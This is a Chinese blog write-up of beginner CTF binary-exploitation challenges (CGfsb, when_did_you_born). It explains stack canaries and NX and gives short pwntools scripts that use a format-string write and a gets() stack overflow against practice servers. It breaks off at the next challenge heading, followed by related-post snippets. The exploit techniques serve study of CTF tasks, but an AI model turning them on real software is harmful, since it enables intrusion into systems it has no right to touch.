攻防世界PWN新手练习区WP

最新推荐文章于 2023-06-01 09:59:10 发布
最新推荐文章于 2023-06-01 09:59:10 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44540286/article/details/101629735
版权

近期笨逼菜鸡开始接触PWN 刷了刷攻防世界的题目 在这里记录下自己的学习成果

CGfsb

首先是PWN题的常规起手式 查壳查保护 捎带着看下程序信息
发现无壳 但是存在Canary保护和NX保护
在这里插入图片描述

这里先讲一下什么是Canary保护
Canary保护主要是用来防护栈溢出的 在开启Canary保护程序调用函数的时候 会在栈中压入一个随机Canary值 在函数结束的时候程序会判断Canary值是否发生变动 如果发生变动就认为是程序遭到了攻击 程序直接异常退出 Canary值通常和函数返回地址在栈中相连 主要是防护攻击者更改程序返回地址来执行shellcode
这里我们直接拿本题做例子
在这里插入图片描述可以明确看到程序现在在存储Canary值 我们在数据下硬件读写断点 然后让程序跑起来
在这里插入图片描述这里在函数末尾取出Canary值 如果与刚开始的值不一致 执行stack_chk_fail函数
对于如何绕过Canary保护 基本思路是利用各种漏洞 先泄漏出来Canary的地址 然后取出值 等溢出过后再还原 当然具体如何利用还得就题论题

同时也讲一下NX保护吧 NX保护一般是不可绕过的 他是禁止了栈执行 也就是即使你写入了shellcode 但是如果NX保护开启的话 也是不能在栈上执行的

回到本题 先随便执行下 就是输入用户名和留言 然后程序原样打印出来
在这里插入图片描述
没什么世纪大发现 那就常规操作 载入IDA吧
在这里插入图片描述
发现程序存在格式化字符串漏洞 然后理解下程序逻辑 简单来说就是将pwnme变量的值更改为8就能拿到flag了 双击pwnme看一下 发现pwnme变量还是一个在bss段的全局变量 那基本思路已经有了
在这里插入图片描述
解法基本就是通过格式化字符串漏洞更改pwnme的值了 那第一步就是测试程序的回显位了 这里我的回显位是在第十位
在这里插入图片描述
那基本信息获取的差不多了 就可以开始编写脚本了

from pwn import *
sh=remote("111.198.29.45","48339")
sh.recvuntil("please tell me your name:")
sh.sendline("Dust")
sh.recvuntil("leave your message please:")

payload=p32(0x0804A068)+'0000%10$n'

sh.sendline(payload)
sh.interactive()

执行脚本即可
在这里插入图片描述
得到flag:cyberpeace{bb8c9af83fb8e8913ed25c1d5cc41751}

when_did_you_born

照例 日常开局…
在这里插入图片描述
跑一下 没啥思路 直接载入IDA吧
在这里插入图片描述
简单理解下 就是程序要求变量v5的值最后为1926 而程序开始的输入不允许输入1926…初看是自相矛盾的…话说哪道Pwn题给的初始条件不是自相矛盾的… 在代码中发现gets函数…因为gets函数不会限制输入的字符个数 初步怀疑是栈溢出 双击v4查看程序栈图
在这里插入图片描述
没跑了 栈溢出 直接开始写脚本吧

这里解释下为什么程序开启了Canary保护依然可以使用栈溢出漏洞 这是因为Canary保护主要是防护函数的返回地址不被篡改的 从这里程序的栈图就能看出 Canary值的变量名就是var_8 如果我们切换到汇编窗口 就能看到最后的校验使用的就是这个var_8变量
在这里插入图片描述

from pwn import *
sh=remote("111.198.29.45","45209")
sh.recvuntil("What's Your Birth?")
sh.sendline("1925")
sh.recvuntil("What's Your Name?")

payload="A"*0x8+p64(1926)

sh.sendline(payload)
sh.interactive()

执行即可
在这里插入图片描述
得到flag:cyberpeace{5f65371d87fafa327d2c0d3e254cfab5}

hello_pwn

Aorio
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界PWN新手WP
weixin_45461609的博客
02-23 1594
攻防世界PWNget shellwhen did you bornhello_pwnlevel2待更新 get shell nc + 地址 直接连接cat flag when did you born 运行一遍,报错,段错误,栈溢出 拖进IDA 可以观察到当v5==1926的时候就会cat flag 但是当v5 == 1926 的时候又会报错 观察到这里还有一个v4而且是栈溢出的点 不妨点进去...
攻防世界-re新手wp
令则
10-10 1489
攻防世界-re新手wp https://adworld.xctf.org.cn/ 文章目录攻防世界-re新手wpre1ganmehello,ctfopen-sourcesimple-unpacklogmeininsanityno-strings-attached使用静态分析:使用动态调试:csaw2013reversing2gititpython-trademaze最后 re1 下载附件文...
攻防世界pwn新手题解-level3
weixin_62621015的博客
04-17 867
攻防世界pwn-level3详细题解。
攻防世界-pwn 新手练习
hanqdi_的博客
02-24 2289
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2036
攻防世界hello pwn WPpwn入门基础题)的简单讲解
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 399
做题记录
攻防世界 pwn——pwnstack
CNS-Enterprise BCC-1701-J
06-01 1029
攻防世界 做题练习
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn1 一道pwn练习
05-07
pwn练习
攻防世界 pwn进阶解法 write up(一)
qq_46441427的博客
03-01 374
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
adworld攻防世界-pwn-新手-wp
令则
03-05 943
adworld-pwn-新手 tcl 到现在才算是正经昨晚攻防世界的pwn新手, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
pwn学习-攻防世界新手
qq_45653588的博客
12-20 1373
文章目录0X00 hello_pwn0X01 when_did_you_born0X02 level00X03 level20x04 CGfsb0x05 guess_num0x06 cgpwn20x07 int_overflow0x08 level30x09 string 0X00 hello_pwn 下载文件,拖入Ubuntu用checksec查看,64位文件,开启了NX保护。 拖入ida查看,read函数读取输入赋值给unk_601068,然后判断dword_60106C是否等于nuaa,相等则执行s
攻防世界pwn新手整理
Lenard404的博客
08-19 3086
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界pwn新手wp(通俗易懂)
njh18790816639的博客
03-10 1749
get_shell 这道题先看看附件,探查一下信息,再用ida打开,就可以发现伪代码其实很简单的: 然后在远程连接这个端口进行攻击了。 并且我们能看到它的大致防护信息,然后来个脚本: 此时就可以进行攻击了。 这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试: 大概的知道了一些漏洞,和一点信息,我们就可以进行破解了。 ...
Crypto_30_vHsm_Types.h
最新发布
07-09
Crypto_30_vHsm_Types
攻防世界pwn新手题答案
08-10
- *3* [攻防世界 pwn 二进制漏洞简单题练习 答题(1-10题解)](https://blog.csdn.net/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值